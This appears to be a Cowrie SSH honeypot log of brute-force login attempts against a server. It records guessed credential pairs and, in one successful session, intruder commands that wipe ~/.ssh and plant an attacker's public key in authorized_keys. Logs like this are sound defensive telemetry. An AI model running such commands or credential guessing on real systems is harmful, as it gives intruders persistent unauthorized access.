{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:04:58.150737Z","src_ip":"93.113.63.124","session":"2ff2e2471449"}
{"eventid":"cowrie.login.success","username":"root","password":"Avatar","message":"login attempt [root/Avatar] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:04:58.492481Z","src_ip":"93.113.63.124","session":"2ff2e2471449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:04:58.763243Z","src_ip":"93.113.63.124","session":"2ff2e2471449"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:04:58.764173Z","src_ip":"93.113.63.124","session":"2ff2e2471449"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:04:58.765531Z","src_ip":"93.113.63.124","session":"2ff2e2471449"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:04:58.836692Z","src_ip":"93.113.63.124","session":"2ff2e2471449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:04:59.053139Z","src_ip":"93.113.63.124","session":"2ff2e2471449"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:04:59.054132Z","src_ip":"93.113.63.124","session":"2ff2e2471449"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:04:59.205478Z","src_ip":"93.113.63.124","session":"2ff2e2471449"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:04:59.206448Z","src_ip":"93.113.63.124","session":"2ff2e2471449"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":37804,"dst_ip":"1.2.3.4","dst_port":22,"session":"8066002ad38e","protocol":"ssh","message":"New connection: 93.113.63.124:37804 (1.2.3.4:22) [session: 8066002ad38e]","sensor":"my-vps","timestamp":"2025-09-09T00:04:59.253223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:04:59.253877Z","src_ip":"93.113.63.124","session":"8066002ad38e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:04:59.313503Z","src_ip":"93.113.63.124","session":"8066002ad38e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:04:59.666717Z","src_ip":"93.113.63.124","session":"8066002ad38e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:05:00.751962Z","src_ip":"93.113.63.124","session":"8066002ad38e"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":37812,"dst_ip":"1.2.3.4","dst_port":22,"session":"b06b66b1a98a","protocol":"ssh","message":"New connection: 93.113.63.124:37812 (1.2.3.4:22) [session: b06b66b1a98a]","sensor":"my-vps","timestamp":"2025-09-09T00:05:00.811921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:05:00.812910Z","src_ip":"93.113.63.124","session":"b06b66b1a98a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:05:00.873341Z","src_ip":"93.113.63.124","session":"b06b66b1a98a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:05:01.225340Z","src_ip":"93.113.63.124","session":"b06b66b1a98a"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:05:01.289892Z","src_ip":"93.113.63.124","session":"b06b66b1a98a"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:05:01.300694Z","src_ip":"93.113.63.124","session":"2ff2e2471449"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":43700,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e319dadb1ae","protocol":"ssh","message":"New connection: 182.18.161.165:43700 (1.2.3.4:22) [session: 9e319dadb1ae]","sensor":"my-vps","timestamp":"2025-09-09T00:05:13.356094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:05:13.356989Z","src_ip":"182.18.161.165","session":"9e319dadb1ae"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:05:13.606021Z","src_ip":"182.18.161.165","session":"9e319dadb1ae"}
{"eventid":"cowrie.login.failed","username":"debian","password":"debian@123","message":"login attempt [debian/debian@123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:05:14.642855Z","src_ip":"182.18.161.165","session":"9e319dadb1ae"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:05:15.893957Z","src_ip":"182.18.161.165","session":"9e319dadb1ae"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61394,"dst_ip":"1.2.3.4","dst_port":22,"session":"1738132375ac","protocol":"ssh","message":"New connection: 217.72.205.35:61394 (1.2.3.4:22) [session: 1738132375ac]","sensor":"my-vps","timestamp":"2025-09-09T00:05:33.222269Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:05:33.223476Z","src_ip":"217.72.205.35","session":"1738132375ac"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":56730,"dst_ip":"1.2.3.4","dst_port":22,"session":"0278dbbc4753","protocol":"ssh","message":"New connection: 45.150.34.92:56730 (1.2.3.4:22) [session: 0278dbbc4753]","sensor":"my-vps","timestamp":"2025-09-09T00:05:33.941955Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:05:33.942829Z","src_ip":"45.150.34.92","session":"0278dbbc4753"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:05:33.960540Z","src_ip":"45.150.34.92","session":"0278dbbc4753"}
{"eventid":"cowrie.login.failed","username":"jake","password":"jake1234","message":"login attempt [jake/jake1234] failed","sensor":"my-vps","timestamp":"2025-09-09T00:05:34.073041Z","src_ip":"45.150.34.92","session":"0278dbbc4753"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:05:35.094617Z","src_ip":"45.150.34.92","session":"0278dbbc4753"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":34212,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ea353d7d229","protocol":"ssh","message":"New connection: 182.18.161.165:34212 (1.2.3.4:22) [session: 0ea353d7d229]","sensor":"my-vps","timestamp":"2025-09-09T00:06:27.641445Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:06:27.642323Z","src_ip":"182.18.161.165","session":"0ea353d7d229"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:06:27.896151Z","src_ip":"182.18.161.165","session":"0ea353d7d229"}
{"eventid":"cowrie.login.failed","username":"master","password":"master","message":"login attempt [master/master] failed","sensor":"my-vps","timestamp":"2025-09-09T00:06:28.953469Z","src_ip":"182.18.161.165","session":"0ea353d7d229"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:06:30.211051Z","src_ip":"182.18.161.165","session":"0ea353d7d229"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":38632,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d5ecfe0d44c","protocol":"ssh","message":"New connection: 45.150.34.92:38632 (1.2.3.4:22) [session: 1d5ecfe0d44c]","sensor":"my-vps","timestamp":"2025-09-09T00:06:55.629195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:06:55.630100Z","src_ip":"45.150.34.92","session":"1d5ecfe0d44c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:06:55.889374Z","src_ip":"45.150.34.92","session":"1d5ecfe0d44c"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser1234","message":"login attempt [ftpuser/ftpuser1234] failed","sensor":"my-vps","timestamp":"2025-09-09T00:06:55.942860Z","src_ip":"45.150.34.92","session":"1d5ecfe0d44c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:06:56.962752Z","src_ip":"45.150.34.92","session":"1d5ecfe0d44c"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":54134,"dst_ip":"1.2.3.4","dst_port":22,"session":"b89d617d579c","protocol":"ssh","message":"New connection: 182.18.161.165:54134 (1.2.3.4:22) [session: b89d617d579c]","sensor":"my-vps","timestamp":"2025-09-09T00:07:42.752294Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:07:42.753244Z","src_ip":"182.18.161.165","session":"b89d617d579c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:07:43.007005Z","src_ip":"182.18.161.165","session":"b89d617d579c"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"dspace123","message":"login attempt [dspace/dspace123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:07:44.065331Z","src_ip":"182.18.161.165","session":"b89d617d579c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:07:45.322199Z","src_ip":"182.18.161.165","session":"b89d617d579c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44886,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c53d3eb2953","protocol":"ssh","message":"New connection: 212.227.235.229:44886 (1.2.3.4:22) [session: 8c53d3eb2953]","sensor":"my-vps","timestamp":"2025-09-09T00:07:47.225416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:07:47.342704Z","src_ip":"212.227.235.229","session":"8c53d3eb2953"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-